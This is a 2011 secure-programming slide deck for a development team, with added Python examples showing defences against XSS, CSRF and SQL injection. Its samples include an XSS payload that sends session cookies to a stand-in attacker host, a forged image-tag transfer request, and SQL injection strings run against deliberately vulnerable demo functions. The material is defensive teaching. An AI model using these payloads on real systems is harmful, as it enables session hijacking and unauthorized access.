Security 101

Introduction to Secure Programming for Developers. Made for the Cozi development team.


1. Security 101. Cozi Tech Forum, 2011-02-02. George V. Reilly & Andrew Abrahamowicz, www.Cozi.com
2. Agenda
<ul>
<li>Why should we care about Security?</li>
<li>Top Vulnerabilities of 2010</li>
<li>Examining XSS, XSRF, and SQL Injection</li>
<li>Threat Modeling</li>
</ul>
3. Off Topic
<ul>
<li>Operational Security</li>
<li>Cryptography</li>
<li>Hacking Tutorial</li>
</ul>
4. Why should we care about Security?
<ul>
<li>Just because we haven't been hacked yet doesn't mean it won't happen</li>
<li>The defender has to get everything right; the attacker has to find only one weakness</li>
<li>Loss of trust and reputation</li>
<li>Damage to our systems</li>
<li>Customer or company data exposed</li>
<li>Possible financial liability</li>
</ul>
5. 24 Deadly Sins of Software Security
<ul>
<li>SQL Injection</li>
<li>Server Vulns: XSS, XSRF, Response Splitting</li>
<li>Web Client Vulns: XSS</li>
<li>Magic URLs, Predictable Cookies, Hidden Form Fields</li>
<li>Buffer Overruns</li>
<li>Format String Problems</li>
<li>Integer Overflows</li>
<li>C++ Catastrophes</li>
<li>Catching Exceptions</li>
<li>Command Injection</li>
<li>Failure to Handle Errors Correctly</li>
<li>Information Leakage</li>
<li>Race Conditions</li>
<li>Poor Usability</li>
<li>Not Updating Easily</li>
<li>Executing Code with Too Much Privilege</li>
<li>Failure to Protect Stored Data</li>
<li>The Sins of Mobile Code</li>
<li>Use of Weak Password-Based Systems</li>
<li>Weak Random Numbers</li>
<li>Using Cryptography Incorrectly</li>
<li>Failing to Protect Network Traffic</li>
<li>Improper Use of PKI, esp. SSL</li>
<li>Trusting Network Name Resolution</li>
</ul>
6. 2010 CWE Top 25 Most Dangerous Software Errors
<ul>
<li>Cross-Site Scripting (XSS)</li>
<li>SQL Injection</li>
<li>Classic Buffer Overflow</li>
<li>Cross-Site Request Forgery</li>
<li>Improper Access Control</li>
<li>Reliance on Untrusted Inputs</li>
<li>Path Traversal</li>
<li>Uploading Dangerous Files</li>
<li>OS Command Injection</li>
<li>Missing Encryption</li>
<li>Hard-Coded Credentials</li>
<li>Buffer Access with Incorrect Length Value</li>
<li>PHP File Inclusion</li>
<li>Array Index Validation</li>
<li>Not Handling Errors</li>
<li>Information Exposure Through Error Messages</li>
<li>Integer Overflow/Wraparound</li>
<li>Incorrect Calculation of Buffer Size</li>
<li>Missing Authentication for Critical Function</li>
<li>Download of Code Without Integrity Check</li>
<li>Incorrect Permissions</li>
<li>Allocation of Resources Without Limits</li>
<li>Open Redirect to Untrusted Site</li>
<li>Using Poor Crypto</li>
<li>Race Condition</li>
</ul>
7. OWASP Top 10 App Security Risks, 2010
<ul>
<li>Injection</li>
<li>Cross-Site Scripting</li>
<li>Broken Authentication and Session Management</li>
<li>Insecure Direct Object References</li>
<li>Cross-Site Request Forgery (CSRF or XSRF)</li>
<li>Security Misconfiguration</li>
<li>Insecure Cryptographic Storage</li>
<li>Failure to Restrict URL Access</li>
<li>Insufficient Transport Layer Protection</li>
<li>Unvalidated Redirects and Forwards</li>
</ul>
8. Some General Principles
<ul>
<li>Never trust input: validate it</li>
<li>Defense in Depth</li>
<li>Least Privilege</li>
<li>Learn from Mistakes</li>
<li>Minimize your Attack Surface</li>
</ul>
9. XSS – Cross-Site Scripting
<ul>
<li>App accepts data from an untrusted source without validation</li>
<li>App fails to escape that data before generating the page
<ul><li>Blurs the distinction between data and code</li></ul></li>
<li>Attacker injects malicious script into the web page</li>
<li>The script runs in the victim's browser under the site's own origin, so it gains access to sensitive page content, session cookies, etc.</li>
</ul>
10. XSS Scenario
<ul>
<li>The app uses untrusted data without validation or escaping:
<ul><li><code>page += "&lt;input name='creditcard' type='TEXT' value='" + request.getParameter("CC") + "'&gt;";</code></li></ul></li>
<li>Attacker modifies the <code>CC</code> parameter to close the attribute and the tag, then inject a script:
<ul><li><code>'&gt;&lt;script&gt;document.location='http://www.attacker.com/cgi-bin/cookie.cgi?foo='+document.cookie&lt;/script&gt;'</code></li></ul></li>
<li>Victim clicks the attacker's link; the server reflects the payload into the page it serves back</li>
<li>The injected script sends the session ID to the attacker's website, allowing the attacker to hijack the user's current session.</li>
</ul>
11. XSS Redemption
<ul>
<li>Restrict the input to valid data.
<ul>
<li>Use whitelists, not blacklists</li>
<li>Validate with regexes</li>
</ul></li>
<li>Encode the output for the context it lands in
<ul><li>HTML-encode data placed in the page body or in attributes; URL-encode data placed in a URL</li></ul></li>
<li>For input that goes into response headers, aggressively remove CRLFs; otherwise the attacker can terminate the header and inject further headers or a second body (response splitting).</li>
</ul>
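The scenario on the previous slide and the redemption list above, as one added worked example. This is editor-supplied Python, not code from the slides (which use a Java-style <code>request.getParameter</code>): the vulnerable concatenation sits beside the same rendering with output encoding via <code>html.escape</code>, and a whitelist validator in front of both. What counts as "valid data" for the <code>CC</code> field is an assumption made here (13 to 19 digits that pass the Luhn check); <code>ATTACK_PAYLOAD</code> is the slide's own payload.

```python
import html
import re
from typing import Optional

# The slide's attacker payload (constructed here as a string constant):
# it closes the value='...' attribute, then the <input> tag, then injects
# a script that ships document.cookie to the attacker.
ATTACK_PAYLOAD = ("'><script>document.location="
                  "'http://www.attacker.com/cgi-bin/cookie.cgi?foo='"
                  "+document.cookie</script>'")


def render_cc_input_unsafe(cc_param: str) -> str:
    """The sin from the slide: untrusted data concatenated straight into HTML."""
    return "<input name='creditcard' type='TEXT' value='" + cc_param + "'>"


def render_cc_input_escaped(cc_param: str) -> str:
    """Output encoding only. html.escape(quote=True) also encodes ' and ",
    so the payload can no longer terminate the single-quoted attribute."""
    return ("<input name='creditcard' type='TEXT' value='"
            + html.escape(cc_param, quote=True) + "'>")


# Whitelist for the CC field (assumed definition of "valid data"): digits only,
# 13 to 19 of them, after stripping the spaces/dashes users commonly type.
_CC_RE = re.compile(r"^[0-9]{13,19}$")


def luhn_ok(digits: str) -> bool:
    """Luhn check digit: a stronger whitelist than 'all digits'."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:          # every second digit from the right is doubled
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0


def validate_cc(cc_param: str) -> Optional[str]:
    """Input validation: returns the normalised card number, or None."""
    cleaned = re.sub(r"[ -]", "", cc_param)
    if not _CC_RE.match(cleaned) or not luhn_ok(cleaned):
        return None
    return cleaned


def render_cc_input_safe(cc_param: str) -> str:
    """Both layers (defense in depth): reject anything that is not a card
    number, and still encode whatever is echoed back, so a later change that
    loosens the whitelist does not silently reopen the XSS."""
    cleaned = validate_cc(cc_param)
    if cleaned is None:
        cleaned = ""            # never echo rejected input back to the page
    return render_cc_input_escaped(cleaned)
```

Validation and encoding are kept as separate functions on purpose: the regex protects this one field, while the encoding protects every place the value is ever reflected, including ones added later.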
12. XSRF – Cross-Site Request Forgery
<ul>
<li>XSS: the client trusts the server to do the right thing</li>
<li>XSRF: the server has too much trust in the client</li>
<li>The server can't tell whether the user intentionally initiated a request or an attacker's page caused the browser to initiate it; the browser attaches the session cookie either way.</li>
</ul>
13. XSRF Scenario
<ul>
<li>App allows a user to submit a state-changing request without a secret:
<ul><li><code>http://example.com/app/transferFunds?amount=1500&amp;destinationAccount=4673243243</code></li></ul></li>
<li>Bad img/iframe on an attacker-controlled site:
<ul><li><code>&lt;img src="http://example.com/app/transferFunds?amount=1500&amp;destinationAccount=attackersAcct#" width="0" /&gt;</code></li></ul></li>
<li>If the victim visits the attacker's site while already authenticated to example.com, the forged request carries the user's session cookie, and the server treats it as authorized.</li>
</ul>
14. XSRF Redemption
<ul>
<li>Add a secret random value (nonce) to the web client and the web server session, and reject state-changing requests whose nonce does not match the session's.
<ul><li>Send it in the form or request body, not in a cookie: anything in a cookie is attached to cross-site requests automatically, which is exactly the attacker's vector.</li></ul></li>
<li>Add a timeout to the session</li>
<li>Use POST rather than GET for state changes (necessary but not sufficient on its own: an attacker's page can auto-submit a POST form, so the nonce is still required)</li>
</ul>
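The three redemption items above and the scenario on the previous slide, as one added worked example. This is editor-supplied Python, not code from the slides: a server-side session holding the nonce (the synchronizer-token pattern the slide describes), the legitimate page embedding it as a hidden POST field, and a <code>/app/transferFunds</code> handler that refuses the slide's <code>&lt;img&gt;</code> forgery. The 15-minute idle timeout, the <code>sid</code> cookie name and the in-memory session store are assumptions.

```python
import hmac
import secrets
import time
from typing import Dict

# Assumed idle timeout for the slide's "add a timeout to the session".
SESSION_TIMEOUT = 15 * 60  # seconds


class Session:
    """Server-side session state. The CSRF token is stored here and echoed
    into the page's forms; it is deliberately NOT put in a cookie, because a
    cookie is attached to cross-site requests automatically."""

    def __init__(self, user: str, now: float) -> None:
        self.user = user
        self.csrf_token = secrets.token_urlsafe(32)   # unguessable nonce
        self.last_seen = now

    def expired(self, now: float) -> bool:
        return now - self.last_seen > SESSION_TIMEOUT


SESSIONS: Dict[str, Session] = {}   # value of the 'sid' cookie -> Session


def login(user: str, now: float) -> str:
    """Creates a session; returns the id the app would set as the 'sid' cookie."""
    sid = secrets.token_urlsafe(32)
    SESSIONS[sid] = Session(user, now)
    return sid


def transfer_form_html(sid: str) -> str:
    """The legitimate page: the nonce rides along as a hidden POST field.
    An attacker's page cannot read this form (same-origin policy), so it
    cannot build a forged request that carries the token."""
    tok = SESSIONS[sid].csrf_token
    return ('<form method="POST" action="/app/transferFunds">'
            f'<input type="hidden" name="csrf_token" value="{tok}">'
            '<input name="amount"><input name="destinationAccount">'
            '</form>')


def handle_transfer(method: str, cookies: Dict[str, str],
                    form: Dict[str, str], now: float) -> str:
    """Server side of /app/transferFunds. Returns 'ok' or a rejection reason.
    Checks, in order: live session, timeout, POST only, and a token that
    matches THIS session's token (constant-time compare, so the token cannot
    be recovered byte by byte through timing)."""
    sid = cookies.get("sid", "")
    sess = SESSIONS.get(sid)
    if sess is None:
        return "rejected: not authenticated"
    if sess.expired(now):
        del SESSIONS[sid]
        return "rejected: session expired"
    if method != "POST":
        return "rejected: state change must be POST"
    supplied = form.get("csrf_token", "")
    if not hmac.compare_digest(supplied.encode(), sess.csrf_token.encode()):
        return "rejected: missing or wrong CSRF token"
    sess.last_seen = now
    # ... perform the transfer of form["amount"] to form["destinationAccount"]
    return "ok"


if __name__ == "__main__":
    now = time.time()
    sid = login("alice", now)
    # The slide's <img src="...transferFunds?..."> forgery: GET, cookie, no token.
    print(handle_transfer("GET", {"sid": sid}, {"amount": "1500"}, now))
    # The same request made from the legitimate form.
    print(handle_transfer("POST", {"sid": sid},
                          {"csrf_token": SESSIONS[sid].csrf_token}, now))
```

The order of the checks is deliberate: the token is compared against the token of the session named by the cookie, so a token the attacker obtained from their own session is just as useless as no token at all.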
15. SQL Injection
16. SQL Injection Redemption
<ul>
<li>Never use string concatenation/replacement to build SQL expressions from input</li>
<li>Never trust input (validation alone is potentially difficult: a legitimate surname can contain a quote)</li>
<li>Use prepared (aka parameterized) SQL statements
<ul><li>ORMs like SQLAlchemy and NHibernate do this by default; raw SQL strings you hand them are still your responsibility</li></ul></li>
<li>Perhaps encrypt the underlying data
<ul><li>Defense in depth in case of a breach</li></ul></li>
</ul>
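The redemption list above as an added worked example in Python's standard-library <code>sqlite3</code> (editor-supplied, not code from the slides; the <code>users</code> table and its two rows are constructed for the demo). It shows the concatenated login query beside the parameterized one, both fed the classic <code>' OR '1'='1</code> and comment-out payloads, and goes one step beyond the slide: an ORDER BY key cannot be a bound parameter, so there the defense is a server-side whitelist rather than a placeholder.

```python
import sqlite3
from typing import List


def make_db() -> sqlite3.Connection:
    """Constructed in-memory table with two known accounts. (Passwords are
    stored in clear only to keep the demo short; a real table holds hashes.)"""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("alice", "correct horse"), ("bob", "battery staple")])
    conn.commit()
    return conn


def login_concat(conn: sqlite3.Connection, name: str, password: str) -> bool:
    """The sin: the query TEXT is built from input, so quotes and comment
    markers in the input become part of the SQL grammar."""
    sql = ("SELECT COUNT(*) FROM users WHERE name = '" + name
           + "' AND password = '" + password + "'")
    return conn.execute(sql).fetchone()[0] > 0


def login_param(conn: sqlite3.Connection, name: str, password: str) -> bool:
    """Redemption: a parameterized statement. The query text is a constant;
    input is bound to the ? placeholders as data and can never change the
    query's structure, whatever characters it contains."""
    sql = "SELECT COUNT(*) FROM users WHERE name = ? AND password = ?"
    return conn.execute(sql, (name, password)).fetchone()[0] > 0


# Identifiers (column names, ORDER BY clauses) cannot be bound as parameters,
# so there the answer is a whitelist: map the user's sort key to a fixed
# fragment chosen by the server, never to the user's own text.
ALLOWED_ORDER = {"name": "name ASC", "newest": "rowid DESC"}


def list_users(conn: sqlite3.Connection, sort_key: str) -> List[str]:
    clause = ALLOWED_ORDER.get(sort_key)
    if clause is None:
        raise ValueError("unsupported sort key")
    rows = conn.execute("SELECT name FROM users ORDER BY " + clause)
    return [r[0] for r in rows]


if __name__ == "__main__":
    db = make_db()
    payload = "' OR '1'='1"
    print("concat  :", login_concat(db, "alice", payload))   # bypassed
    print("param   :", login_param(db, "alice", payload))    # rejected
    print("comment :", login_concat(db, "alice' --", "x"))  # password check commented out
```

The concatenation in <code>list_users</code> is of a server-chosen constant, not of the request parameter; the parameter only ever selects which constant is used, which is the whitelist principle from the XSS slides applied to SQL.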
17. Threat Modeling
<ul>
<li>You cannot build a secure system until you understand your threats</li>
<li>STRIDE – categorize</li>
<li>DREAD – calculate risk</li>
<li>Examine data flow</li>
</ul>
18. Categorize Threats with STRIDE
<ul>
<li>Spoofing Identity</li>
<li>Tampering with Data</li>
<li>Repudiation</li>
<li>Information Disclosure</li>
<li>Denial of Service</li>
<li>Elevation of Privilege</li>
<li>STRIDE classifies effects; you should also categorize vulns according to cause</li>
</ul>
19. Use DREAD to Calculate Risk
<ul>
<li>Risk = Criticality * Likelihood of Occurrence</li>
<li>Damage Potential</li>
<li>Reproducibility</li>
<li>Exploitability</li>
<li>Affected Users</li>
<li>Discoverability</li>
<li>Damage Potential and Affected Users capture criticality; Reproducibility, Exploitability and Discoverability capture likelihood</li>
<li>Rate each factor 1-10. DREAD score = sum / 5, i.e. the average, so it is also on a 1-10 scale</li>
</ul>
